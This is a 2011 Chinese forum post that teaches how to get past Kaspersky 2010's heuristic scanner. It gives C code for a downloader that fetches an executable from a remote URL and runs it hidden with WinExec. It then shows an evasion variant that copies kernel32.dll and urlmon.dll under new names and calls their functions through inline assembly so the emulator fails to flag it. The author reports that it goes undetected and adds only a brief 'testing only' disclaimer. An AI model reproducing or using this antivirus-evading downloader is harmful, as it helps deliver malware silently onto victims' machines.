本帖最后由 a445441 于 2011-7-25 09:40 编辑
卡巴斯基2010有强大的启发式扫描,其实启发式扫描有很多弱点,有一个就是不能完全的模拟程序的运行环境,这就可能给我们留出来了一块空间来绕过启发式扫描,其实其它杀毒软件的启发式扫描都存在这些空间,下面就来分析一下卡巴斯基的启发式扫描吧!
首先要编一段程序来完成测试,程序一定要非常的针对启发式扫描这一块的,不然的话没有效果,选那段代码来测试呢?恩,有段代码启发式扫描几乎都要扫描的,那就是下载者的代码,一般的下载者代码如下:
int _tmain(int argc, _TCHAR* argv[])
{
URLDownloadToFileA(NULL,"http://www.hehe/yan.exe","c:\\yan.exe",0,NULL);
WinExec("C:\\yan.exe",SW_HIDE);
}
上面代码应该是最熟悉的了,启发式扫描发现调用URLDownloadToFileA和WinExec就认为是病毒了,先写这么一个程序,放到卡巴斯基2010下测试如图:
上图知道卡巴报下载者病毒,看来卡巴的启发式扫描起作用啦,经过测试,无论改成动态调用还是其它方案,只要调用Kennel32.dll中的WinExec和UrlMon.dll中的URLDownloadToFileA都无法躲过卡巴斯基的启发式扫描。
绕过分析
下面开始以启发式扫描的弱点来测试,那就是不能完全模拟程序运行环境的,当我们创建文件等操作时,在启发式扫描的环境中实际是没有操作的,那么方法诞生了,可以先复制一个Kernel32.dll的副本Kaba.dll,然后动态调用KaBa.dll中的WinExec函数,那么启发式扫描应该作废了,因为在启发式扫描的环境中根本不会真正的复制一个Kaba.dll文件,那么我们的动态调用就是未知的,所以我们的程序很安全。修改代码如下:
char * Str="c:\\yan.exe";
char * Url="http://www.hehe/yan.exe";
CopyFileA("C:\\windows\\system32\\urlmon.dll","c:\\windows\\system32\\KaBaUrl.dll",true);
LoadLibrary("KaBaUrl.dll");
PVOID Dwon=GetProcAddress(GetModuleHandle("KaBaUrl.dll"),"URLDownloadToFileA");
_asm
{
push 0
push 0
push Str
push Url
push 0
call Dwon
}
CopyFileA("c:\\windows\\system32\\kernel32.dll","c:\\windows\\system32\\KaBa.dll",true); LoadLibrary("KaBa.dll");
PVOID Fun=GetProcAddress(GetModuleHandle("KaBa.dll"),"WinExec");
_asm
{
push SW_HIDE
push Str
call Fun
}
上面代码生成的程序运行时,卡巴不会有任何反应,看来启发式扫描还有很大的缺点,最后希望卡巴斯基的启发式扫描越来越完善,到杀毒软件的启发式扫描能完全模拟程序运行环境时,那么启发式扫描可能就不叫启发式扫描了,呵呵。(声明:上面代码只做测试使用,凡是用于非法用途的,后果自负。) |
发表于 2011-7-25 09:38:28
发表于 2011-7-25 22:56:24
